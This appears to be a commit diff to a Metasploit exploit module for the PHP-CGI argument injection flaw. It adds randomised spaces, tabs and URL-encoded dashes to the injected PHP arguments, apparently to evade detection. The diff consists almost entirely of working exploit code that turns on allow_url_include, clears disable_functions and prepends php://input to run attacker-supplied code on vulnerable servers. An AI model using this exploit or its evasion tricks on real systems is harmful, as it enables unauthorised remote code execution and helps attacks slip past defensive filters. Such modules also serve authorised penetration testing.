Added lots or encoding randomness

modules/exploits/multi/http/php_cgi_arg_injection.rb

@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return Exploit::CheckCode::Unknown
 		end
 
-		response = send_request_raw({ 'uri' => uri + '?-s'})
+		response = send_request_raw({ 'uri' => uri + "?#{create_arg("s")}"})
 		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
 			return Exploit::CheckCode::Vulnerable
 		end
@@ -85,13 +85,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		begin
 			args = [
-				"-d+allow_url_include%3d#{rand_php_ini_true}",
-				"-d+safe_mode%3d#{rand_php_ini_false}",
-				"-d+suhosin.simulation%3d#{rand_php_ini_true}",
-				"-d+disable_functions%3d%22%22",
-				"-d+open_basedir%3dnone",
-				"-d+auto_prepend_file%3dphp://input",
-				"-n"
+				rand_spaces(rand(50)),
+				create_arg("d","allow_url_include%3d#{rand_php_ini_true}"),
+				create_arg("d","safe_mode%3d#{rand_php_ini_false}"),
+				create_arg("d","suhosin.simulation%3d#{rand_php_ini_true}"),
+				create_arg("d","disable_functions%3d%22%22"),
+				create_arg("d","open_basedir%3dnone"),
+				create_arg("d","auto_prepend_file%3dphp://input"),
+				create_arg("n")
 			]
 
 			qs = args.join("+")
@@ -117,6 +118,32 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	end
 	
+	def create_arg(arg, val = nil)
+		# TODO: Randomly URI encode val - bear in mind = must always be encoded.
+		ret = ''
+		ret << "#{rand_spaces(rand(10))}"
+		ret << "#{rand_dash}"
+		ret << "#{arg}"
+		ret << "#{rand_spaces(rand(10))}"
+		ret << "#{val}"
+	end
+	
+	def rand_spaces(x)
+		ret = ''
+		   x.times {
+		   	ret << rand_space
+		   }
+		ret	   	
+	end
+	
+	def rand_space
+	  	["%20","%09","+"][rand(3)]
+	end
+	
+	def rand_dash
+		["-","%2d"][rand(2)]
+	end
+
 	def rand_php_ini_false
 		Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])
 	end